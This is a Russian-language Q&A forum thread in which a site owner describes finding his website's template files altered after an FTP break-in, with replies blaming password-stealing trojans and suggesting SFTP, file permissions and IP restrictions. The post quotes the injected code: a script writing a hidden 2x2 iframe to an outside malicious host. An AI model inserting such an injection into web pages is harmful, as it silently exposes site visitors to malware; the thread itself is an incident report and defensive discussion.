Вирусы на сайте. Как взломали FTP?

2 июля неожиданно пришло мне на почту вот такое письмо от Яндекса:

Some of the pages on your website may pose a threat to your visitor's computer security. The number of potentially harmful pages is 1.



Зарегистрировался на webmaster.yandex.com, запустил повторную проверку. На следующий день оно написало, что всё нормально, но я всё таки решил сравнить все файлы сайта с прошлогодней копией. Оказалось, что отличаются 12 файлов.


В папке temlates два файла имели дату 29.06.12. В файле header.tpl вместо строки

<body style="background: url(<?=PATH_WEB?>img/main_bg.gif) repeat-y center #244e9f;">



обнаружилось вот такое безобразие:

<body style="background: url(<?=PATH_WEB?><!--c3284d--> type="text/javascript">
document.write('<iframe src="httр://yоgоtraff.cu.cc/in.cgi?11" name="Google " scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->

img/main_bg.gif) repeat-y center #244e9f;">



То же самое было в файле galleryEdit.tpl и ещё в десяти файлах в папке script\jscalendar.


Если поискать в Google, этот yogotraff можно встретить в коде множества русских сайтов: www.google.ru/search?ie=UTF-8&hl=ru&q=yogotraff.


Явно, это какая-то вредоносная дрянь. Разумеется, я восстановил файлы, поменял пароли и написал запрос хостинг-провайдеру, с вопросом каким образом произошло заражение. Получил ответ и логи. В это время кто-то с американского адреса 208.77.96.72 залез на два моих ftp (причём второе находится внутри первого) и заменил там кучу файлов. Как выяснилось, пострадали и другие мои сайты. Провайдер предложил проверить мой компьютер на вирусы. Проверил. DrWeb'ом и Касперским с загрузочных дисков для очистки совести. Нету вирусов. Только всякая мелочёвка в кэше FireFox'а. И как же тогда у меня утащили ftp-пароль? Он сложный, его не подберёшь.


Как страшно жить.
  • Вопрос задан
  • 5545 просмотров
Пригласить эксперта
Ответы на вопрос 7
@Ruma7a
«Он сложный, его не подберёшь»

Угу, только вот передаётся в виде plain text ) Может стоит подумать об SSH/SFTP? Заранее прошу прощения, если у вас и так уже всё секурно в этом плане, просто у вас там упоминается «просто» FTP.
Ответ написан
Достаточно стандартная ситуация — прут троянцем FTP-пароли на сайты. То есть вирусы есть или были. Ищите троянца на всех компьютерах, с которых был доступ к сайту по FTP, возможно ходили еще откуда-то и забыли об этом. Меняйте пароль на FTP-доступ. Через шел ставьте разрешения на файлы такие, чтобы через FTP нельзя было их перезаписать, каждый раз, когда необходимо обновить сайт — меняйте разрешения обратно.
Ответ написан
А у хостера не Plesk случаем?
Ответ написан
@Niemand
Знаю точно, что так прут пароли из старых версий Filezilla, WS_FTP (про новые не знаю) и Total Commander.
Ответ написан
Комментировать
@freem4n
Сайты хостятся на шаредном хостинге? ОС сервера?
Ответ написан
charliez
@charliez
достаточно зайти на зараженный по такой же схеме сайт любым браузером, и через уязвимости adobe flash / sun java вирус активируется на компьютере и сканирует сохраненные пароли в файлах настроек популярных ftp клиентов.
Ответ написан
Комментировать
@odmin4eg
стандартная ситуация, как пишут выше, протроянен комп с которого хоть раз заходили на сайт.

троянцы давно умеют собирать пароли с «фар» «тотал коммандера» и прочих популярных программ.

меняйте пароли следите за попытками входа, ограничте входящие айпи на фтп
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы